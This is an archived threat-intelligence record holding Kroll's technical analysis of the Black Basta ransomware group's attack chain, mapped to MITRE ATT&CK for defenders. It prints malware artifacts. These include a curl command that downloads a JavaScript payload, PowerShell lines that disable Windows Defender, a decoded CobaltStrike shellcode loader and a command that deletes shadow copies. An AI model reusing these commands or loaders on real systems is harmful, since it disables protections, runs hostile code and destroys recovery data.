{
	"id": "b2dc3a3e-2a7f-4702-bf41-b98c83ef6b57",
	"created_at": "2026-04-06T00:16:41.906773Z",
	"updated_at": "2026-04-10T03:20:52.78593Z",
	"deleted_at": null,
	"sha1_hash": "4b3eddafe4361bc33925007f4cb5dac8fe9adb6b",
	"title": "Black Basta - Technical Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2317390,
	"plain_text": "Black Basta - Technical Analysis\r\nPublished: 2023-01-23 · Archived: 2026-04-05 22:34:05 UTC\r\nKey Takeaways\r\nKroll has identified both unique and common tactics, techniques and procedures (TTP) used by Black\r\nBasta to conduct double extortion ransomware campaigns. Vulnerable organizations are advised to\r\nproactively apply appropriate countermeasures to reduce their risk exposure.\r\nAttack objectives include disabling anti-virus and endpoint detection and response tools, exfiltrating\r\nsensitive data and encrypting files with the “.basta” extension.\r\nInitial access is often acquired via malicious links in spearphishing emails. Common tools used by Black\r\nBasta are Qakbot, SystemBC, Mimikatz, CobaltStrike and Rclone. \r\nSummary\r\nIn recent months, news outlets have reported a surge in double extortion ransomware attacks by Black Basta, a\r\nnotorious ransomware-as-a-service (RaaS) threat group first identified in early 2022. The actor is sophisticated,\r\noften utilizing a unique set of tactics, techniques and procedures (TTPs) to gain a foothold, spread laterally,\r\nexfiltrate data and drop ransomware. However, Kroll has observed Black Basta sometimes utilizing similar TTPs\r\nacross multiple incidents. Therefore, it's prudent for potential victims to educate themselves and adopt proactive\r\ncountermeasures to reduce their risk exposure.\r\nBlack Basta often gains initial access via a link to a malicious document delivered by email in the form of a\r\npassword-protected zip file. Once extracted, the document installs the Qakbot banking trojan to establish backdoor\r\naccess and deploy SystemBC, which establishes an encrypted connection to a C2 server. Often, Black Basta will\r\nacquire network persistence via legitimate remote access software tools.\r\nNext, the post-exploitation framework known as CobaltStrike is installed for reconnaissance and deploying\r\nadditional tooling across the network. 
Unlike most threat actors, Black Basta utilizes numerous tool deployment\r\nand remote access methods.\r\nBlack Basta often attempts to disable security tooling via premade scripts that interact with the registry. Kroll has\r\nalso observed attempts to remove or disable endpoint detection and response systems to conceal the deployment\r\nof tools such as Mimikatz and CobaltStrike.\r\nOne of Black Basta’s primary objectives is to exfiltrate data. Most often, this is achieved with Rclone, which can\r\nfilter for specific files before copying them to a cloud service. Once exfiltration is complete, the ransomware\r\nbinary is executed to encrypt files with the “.basta” extension, delete volume shadow copies, and display a ransom\r\nnote named readme.txt on infected devices.\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 1 of 9\n\nBlack Basta dwell time is typically two to three days. However, an extended hibernation period sometimes occurs\r\nafter the initial Qakbot infection. This may indicate that initial access is being sold to associated threat actors.\r\nTactics, Techniques and Procedures\r\nInitial Exploit\r\nKroll has identified that the most common mode of initial access used by Black Basta is a phishing\r\nemail that contains a link to a zip file for the victim to download. The email also often provides a password to the\r\nzip file to increase the perceived “authenticity” of the email. The email addresses used by Black Basta vary\r\nbetween cases.\r\nRe: Victim - Multiple POs attached\r\nGreetings!\r\nPlease check your docs as one doc available through the link lower:\r\nhxxps://sciencesformation[.]com/nsst/ditpciattusie\r\nFile password: U876\r\nWe have a price discrepancy on PO# A123456\r\nITEM: F799-CL - $168.46\r\nFigure 1 - Anonymized Email Example\r\nThis initial access method has held true across a number of cases worked by Kroll. 
It is common for the zip file to have\r\nbeen accessed on several user endpoints. It is likely that the phishing emails are targeted, which suggests some initial\r\nreconnaissance conducted by the threat actors. The link in Figure 1 drops a zip file within the user’s download\r\nfolder. Once opened, a link (.lnk) file masquerades as a document, for example, filename.Doc.lnk. This link file\r\nthen deploys Qakbot onto the endpoint.\r\nMITRE ATT\u0026CK: T1566.002: Spearphishing Link\r\nMITRE ATT\u0026CK: T1204.002: User Execution: Malicious File\r\nInternal Scouting\r\nOne of the first tools deployed by Black Basta is CobaltStrike, which furnishes such post-exploitation capabilities\r\nas network and port scanning. Further information on CobaltStrike is detailed later in this report.\r\nMITRE ATT\u0026CK: T1049: System Network Connections Discovery\r\nToolkit Deployment\r\nAfter the link file is executed, a curl command is executed to download a JavaScript file, and this is then executed\r\nby wscript.exe to compile the Qakbot binary. It also contacts the command-and-control servers to inform the threat\r\nactor that it is alive.\r\n/q /c echo 'zA1' \u0026\u0026 MD \"%APPDATA%\\Iu\\MlSL\" \u0026\u0026 curl.exe --output %APPDATA%\\Iu\\MlSL\\FEqwhs8j.GE.v6E.js hxxps://pa\r\nFigure 2 – Lnk File Contents: Qakbot Initial Execution\r\nMITRE ATT\u0026CK: T1204.002: User Execution: Malicious File\r\nMITRE ATT\u0026CK: T1059.007: JavaScript\r\nTypically, a DLL file is registered by RegSvr32 and a scheduled task is created. Qakbot is utilized to provide\r\nbackdoor access and to deliver the next stage of tooling. Persistence is typically achieved by the creation of\r\nautorun entries and scheduled tasks. 
This allows the threat actor to maintain a foothold within the network with\r\nbackdoor access.\r\nMITRE ATT\u0026CK: T1059.007: JavaScript\r\nBatch scripts are often deployed to inhibit detection by anti-virus or other security software. The script names\r\nvary; however, the content is similar and generally works the same way, removing Windows\r\nDefender in stages. Other scripts to remove specific anti-virus products have also been identified, including a script to\r\nestablish a scheduled task to prevent anti-virus from being re-enabled.\r\npowershell -ExecutionPolicy Bypass -command \"New-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\r\nFigure 3 – Batch Script 1: Disable Windows Defender\r\npowershell -ExecutionPolicy Bypass -command \"Set-MpPreference -DisableRealtimeMonitoring 1\"\r\nFigure 4 – Batch Script 2: Disable Windows Defender Monitoring\r\npowershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender\r\nFigure 5 – Batch Script 3: Remove Windows Defender\r\nKroll has also seen attempts to disable endpoint detection and response (EDR) tooling by utilizing the tool named\r\nBackstab. To achieve this, they use a legitimate copy of the Process Explorer driver within\r\nC:\\Windows\\system32\\drivers\\. This driver is used to kill process handles of the EDR tools. The tool then checks\r\nthe registry for names of common EDR tools and disables User Account Control (UAC) before attempting to remove\r\nthose EDR tools.\r\nMITRE ATT\u0026CK: T1562.001: Disable or Modify Tools\r\nMITRE ATT\u0026CK: T1059: Command and Scripting Interpreter\r\nTo maintain control, Black Basta has been identified by Kroll as using multiple tools for command and control\r\n(C2). 
Common legitimate tools, including AnyDesk, AteraAgent and Splashtop, have been identified as providing\r\nremote access.\r\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nKroll has identified that the remote access tool known as SystemBC is indicative of Black Basta cases. The tool is\r\npreconfigured with C2 domains and can also be utilized as a Tor proxy to provide a channel for the threat actor to\r\ndeploy scripts and other tools. Figure 6 details the Black Basta configuration of SystemBC in one case. The name\r\nof the file is often obfuscated with a random name such as gemoh.exe. SystemBC also creates a scheduled task to\r\nmaintain persistence, usually named the same as the binary itself within C:\\Windows\\Tasks\\.\r\n{\r\n \"HOST1\": \"restoreimagesinc[.]com\",\r\n \"HOST2\": \"restoreimagesinc[.]com\",\r\n \"PORT1\": \"443\",\r\n \"TOR\": \"\"\r\n}\r\nFigure 6 – SystemBC config\r\nMITRE ATT\u0026CK: T1090: Proxy\r\nEscalation\r\nIn a number of Black Basta cases, the threat actor successfully phished a local administrator account; however,\r\nMimikatz is also used to access these credentials via a cache. This is run on the domain controller once access is\r\ngained. Mimikatz is often renamed by Black Basta in a likely attempt to evade security solutions even after\r\ndisabling anti-virus solutions. Mimikatz is a common post-exploitation tool used to collect Windows credentials.\r\nIt is also used for collecting Kerberos tickets and is most commonly used to extract password hashes from LSA\r\ndumps and the Security Account Manager (SAM) database. The credentials are extracted and are then “cracked” to\r\nprovide a credential pair. 
Mimikatz also provides the ability to conduct “pass the hash” by extracting the NTLM\r\nhash and allowing the hash to be forwarded to gain access to other devices without the need to know the victim’s\r\npassword.\r\nMITRE ATT\u0026CK: T1003: OS Credential Dumping\r\nMITRE ATT\u0026CK: T1558: Steal or Forge Kerberos Tickets\r\nBlack Basta attempts to increase privileges with open-source tools such as nircmd.exe and nsudo.exe, which can\r\nallow execution at higher levels of privilege. These are often delivered via Qakbot or SystemBC.\r\nCobaltStrike provides capabilities to gain increased privileges such as SYSTEM-level execution and “pass the\r\nhash” capabilities. Kroll has identified in several Black Basta cases that server message block (SMB) remote\r\nservice execution is leveraged by pushing files from the domain controller (see Lateral Movement for more\r\ndetails). Pass the hash attempts have also been identified with Type 9 logons and corresponding commands passed\r\nvia a named pipe.\r\nMITRE ATT\u0026CK: T1558: Steal or Forge Kerberos Tickets\r\nLateral Movement\r\nBlack Basta has been found by Kroll to be using multiple tools for lateral movement. Common legitimate tools\r\nsuch as AnyDesk, AteraAgent and Splashtop have been identified as not only providing remote access but also\r\nallowing the threat actor to move laterally within the network. Remote desktop protocol (RDP) is regularly used\r\nwith the previously collected credentials.\r\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nMITRE ATT\u0026CK: T1021: Remote Services\r\nTypically, the post-exploitation framework known as CobaltStrike is installed as a service. This provides crucial\r\ncapabilities to the threat actor, including deploying tools and the ransomware binary across the network. This is\r\nusually achieved by an SMB Beacon. CobaltStrike is installed via Qakbot, and this is normally identified via\r\nservice creation with a seven (7) character random alphanumeric name. 
A base64 encoded PowerShell command\r\nlaunched by the Command Specifier (%COMSPEC%) can be found within the service event data, as shown in\r\nFigure 7.\r\n%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEk\r\nFigure 7 – CobaltStrike Service Execution\r\nStandard base64 decoding of the encoded string shown in Figure 7 reveals that a further Gzip-compressed,\r\nbase64 encoded string is present.\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAA/61WbXPauhL+HH6FPmTG9hQogTQNvZOZ8o45QAg\r\nFigure 8 – CobaltStrike Encoded Command\r\nA further base64 encoded blob can be extracted and decrypted with an XOR key of 35, as shown in Figures 9 and\r\n10.\r\nSet-StrictMode -Version 2\r\n$DoIt = @'\r\nfunction func_get_proc_address {\r\nParam ($var_module, $var_procedure)\r\n$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAsse\r\n$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropSer\r\nreturn $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.In\r\n}\r\nfunction func_get_delegate_type {\r\nParam (\r\n[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,\r\n[Parameter(Position = 1)] [Type] $var_return_type = [Void]\r\n)\r\n$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.Asse\r\n$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConve\r\n$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_\r\nreturn $var_type_builder.CreateType()\r\n}\r\n[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwu\r\nfor ($x = 0; $x -lt $var_code.Count; 
$x++) {\r\n$var_code[$x] = $var_code[$x] -bxor 35\r\n}\r\n$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel3\r\n$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)\r\n[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)\r\n$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_dele\r\n$var_runme.Invoke([IntPtr]::Zero)\r\n'@\r\nIf ([IntPtr]::size -eq 8) {\r\nstart-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job\r\n}\r\nelse {\r\nIEX $DoIt\r\n}\r\nFigure 9 – CobaltStrike Decoded Loader\r\nThe named pipe identified in Figure 9 shows the presence of SMB beacons. This allows infected machines to\r\ncommunicate with the threat actor-controlled device via an SMB channel.\r\nFigure 10 – CobaltStrike 32-bit Shellcode with SMB Beacon via a Named Pipe\r\nThe SMB remote service execution allows the threat actor to push tools and malicious files across the network at\r\nSYSTEM-level privileges. Typically, an administrator share, for example “ADMIN$”, is used to store the\r\nmalicious binary to then be executed from a domain controller. 
This activity can be detected through\r\nPowerShell logging.\r\nMITRE ATT\u0026CK: T1543.003: Create or Modify System Process: Windows Service\r\nMITRE ATT\u0026CK: T1059: Command and Scripting Interpreter\r\nMITRE ATT\u0026CK: T1572: Protocol Tunneling\r\nMITRE ATT\u0026CK: T1021.002: Remote Services: SMB/Windows Admin Shares\r\nMITRE ATT\u0026CK: T1071: Application Layer Protocol\r\nMission Execution\r\nOnce Black Basta has established itself on the network, it looks to identify files for exfiltration. Kroll has\r\nidentified that Rclone is Black Basta’s tool of choice for exfiltration, although WinSCP has also been identified.\r\nRclone provides the ability to upload data to a configured cloud storage provider. Detection of this can be\r\nachieved by investigating the system pagefile, the System Resource Usage Monitor (SRUM) and the UsnJrnl ($J).\r\nMITRE ATT\u0026CK: T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nAfter data exfiltration, the next stage is to encrypt endpoints with the Black Basta ransomware binary. The\r\nexecutable name varies between incidents; however, it often provides the same capabilities. 
The binary launches a\r\ncommand line to delete VSS shadow copies with vssadmin, as shown in Figure 11, before encrypting files and\r\ncreating the readme.txt file.\r\nC:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet\r\nFigure 11 – Shadow Copy Deletion by Black Basta Ransomware\r\nDeleting the volume shadow copies helps prevent system recovery, providing further leverage for the threat\r\nactor to demand a ransom for decryption.\r\nMITRE ATT\u0026CK: T1490: Inhibit System Recovery\r\nYour data are stolen and encrypted\r\nThe data will be published on TOR website if you do not pay the ransom\r\nYou can contact us and decrypt one file for free on this TOR site\r\n(you should download and install TOR browser first https://torproject.org)\r\n\u003credacted tor link\u003e\r\nYour company id for log in: \u003credacted\u003e\r\nFigure 12 – Example readme.txt Black Basta Ransom Note\r\nFigure 12 details the standard Black Basta ransom note, which states that data has been exfiltrated. As mentioned\r\nearlier, while exfiltration is common, the encrypted file extensions may vary. Typically, files are appended with\r\n“.basta” but variations of this extension have been identified. The ransomware binary also changes the wallpaper\r\nto the image shown in Figure 13. The binary places a .jpg\r\nFigure 13 – Desktop Wallpaper Configuration\r\nOnce encryption is complete, the threat actor will likely leave the network. If the victim does not interact with the\r\nthreat actor, company information and a data listing will be added to the Black Basta leak site. 
A screenshot of the\r\nleak site can be found in Figure 14.\r\nFigure 14 – Black Basta Leak Site\r\nMITRE ATT\u0026CK: T1486: Data Encrypted for Impact\r\nSource: https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis"
	],
	"report_names": [
		"black-basta-technical-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434601,
	"ts_updated_at": 1775791252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.pdf",
		"text": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.txt",
		"img": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.jpg"
	}
}